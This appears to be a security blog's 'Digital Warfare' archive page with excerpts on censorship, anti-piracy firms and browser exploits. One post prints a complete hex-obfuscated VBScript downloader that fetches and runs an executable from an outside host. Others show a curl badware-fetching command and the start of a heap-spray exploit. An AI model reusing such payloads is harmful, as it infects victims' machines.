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Category Archives: Digital Warfare

Online wars

Real Internet Censorship: Burma

It is often times hard to take serious the small slights of willful and petty companies like Comcast when much larger issues are presenting themselves in other countries. The Open Net Initiative has just released a report on the total suspension of Internet and cellular services in the country of Burma. [pdf] The military junta […]

Fake Torrents and Trackers 09/2007

For realtime updates check Fenopy Fake Finder: These torrents and trackers are reported as fake and setup by the MPAA and RIAA or their affiliates. Any network data recorded by them bearing your IP address could lead to legal action. It may be advisable to block all traffic with fake trackers at your network borders. […]

Chilling effects on security research

An interesting old snippet I pulled from my drafts for the sake of a current research project. Vulnerability research may bring fortune, fame, expensive cars, or lawsuits, jail time, and humorless agents in dark suits. Granick from the front lines of legal scholars Schneier weighs in “Interesting essay, and interesting comments. And here’s an article […]

MediaDefender Fails to Maintain Security

MediaDefender has been having a bad year. First they were found running an entrapment site called Then one of their employees had his work email posted to the Internet. Now it seems they were recorded during a sensitive phone conference with the office of the AG of New York. The latest breach of MediaDefender […]

web exploits using more sophisticated ciphers

found this one today: S=”6f6e206572726f7220726573756D65206E6578740d0a6375726C3D22687474703A2F2f78787476622e636E2F6172702f676F” S=S+”2e657865220D0A666e616D65313D22676F2e657865220D0a666E616d65323D22676F2e766273220D0A536574206466203D20″ S=S+”646f63756D656e742E637265617465456C656d656e7428226f626A65637422290D0a64662E73657441747472696275746520″ S=S+”22636c6173736964222C2022636C7369643A42443936433535362D363541332d313144302D393833412d3030433034464332″ S=S+”39453336220d0a7374723d224d6963726F736F66742E584d4C48545450220D0a5365742078203D2064662e4372656174654F” S=S+”626A656374287374722c2222290D0a43313d2241646f220d0a43323D2264622e220D0a43333d22737472220d0a43343D2265″ S=S+”616d220D0a737472313d43312643322643332643340d0a737472353D737472310D0a7365742053203d2064662e6372656174″ S=S+”656f626a65637428737472352c2222290d0a532e74797065203d20310D0A737472363D22474554220d0A782e4f70656e2073″ S=S+”7472362c206375726c2c2046616c73650D0a782E53656E640d0a73313D22536372697074220D0a73323D22696e672e220d0A” S=S+”73333d2246696c65220d0a73343D2253797374656D4f626a656374220d0a73303D73312b73322b73332b73340d0a73657420″ S=S+”46203D2064662e6372656174656F626a6563742873302c2222290D0a73657420746D70203D20462e4765745370656369616C” S=S+”466f6C6465722832290d0A666e616d65313d20462E4275696c645061746828746D702C666e616d6531290d0A532e6f70656e” S=S+”0d0a532e777269746520782E726573706F6E7365426f64790D0a532e73617665746F66696c6520666E616d65312c320D0a53″ S=S+”2E636C6f73650d0a666E616D65323D20462E4275696C645061746828746d702c666E616d6532290d0a536574207473203d20″ S=S+”462e4f70656e5465787446696c6528666e616d65322C20322c2054727565290D0a74732e57726974654c696E652022536574″ S=S+”205368656c6c203d204372656174654F626a656374282222577363726970742e5368656c6C222229220d0A73716c3D225368″ S=S+”656c6c2E52756e282222222B666e616d65312b22222229220d0A74732e57726974654C696e652073716C0D0a74732e577269″ S=S+”74654c696E652022736574205368656C6c3D4E6F7468696E67220d0A74732e636C6F73650D0A696620462E46696c65457869″ S=S+”73747328666E616D6531293D74727565207468656e0D0a696620462e46696c6545786973747328666E616d6532293d747275″ S=S+”65207468656e0d0A202020207368613D225368656c6c2e417070220d0a202020207368623d7368610d0a2020202073657420″ S=S+”51203D2064662e6372656174656f626a656374287368622B226C69636174696f6E222C2222290D0A20202020512e5368656C” S=S+”6C4578656375746520666e616d65322C22222c22222c226f70656E222C300D0a656e642069660D0a656E642069660D0A”

Simple Shell Script for Testing Badware

day:~ zero$ cat curl -A “Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” $1 | less

New Critical Quicktime Vulnerabilities Out

Just received word that new vulnerabilities exist for Quicktime which can cause infection by simply browsing a website. Don’t let the mitigating circumstances fool you. With the huge number of websites break ins and subsequent iframe injections the chances of a site infecting you is significantly high. An attacker simply doesn’t need to “entice a […]

MediaDefender caught in entrapment scheme

MediaDefender is a long time “enforcement” agency of the MPAA. Recently they were caught setting up a fake online video site (think YouTube for pirated movies) and now claim the site was only an internal project and that they were the victims of libel. The site was taken down amid controversial blogging and coverage from […]

Targeting IE

An easy way to target Internet Explorer is to use VBScript as the exploit obfuscation mechanism. In this case an ancient form of encryption called the Windows Scripting Encoder. It was hoped to “protect” source code from prying eyes but as substitution ciphers go this one didn’t really help much. A decoder was written which […]

Heap Spraying Research

<!– ___________________________________________________________________ ,sSSSs, Ss, Internet Exploiter 2 v0.1 SS” `YS’ ‘*Ss. MSIE R6025 Multithreading issue PoC exploit iS’ ,SS” Copyright (C) 2003, 2004 by Berend-Jan Wever. YS, .ss ,sY” `”YSSP” sSS ____________________________________________________________________ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version […]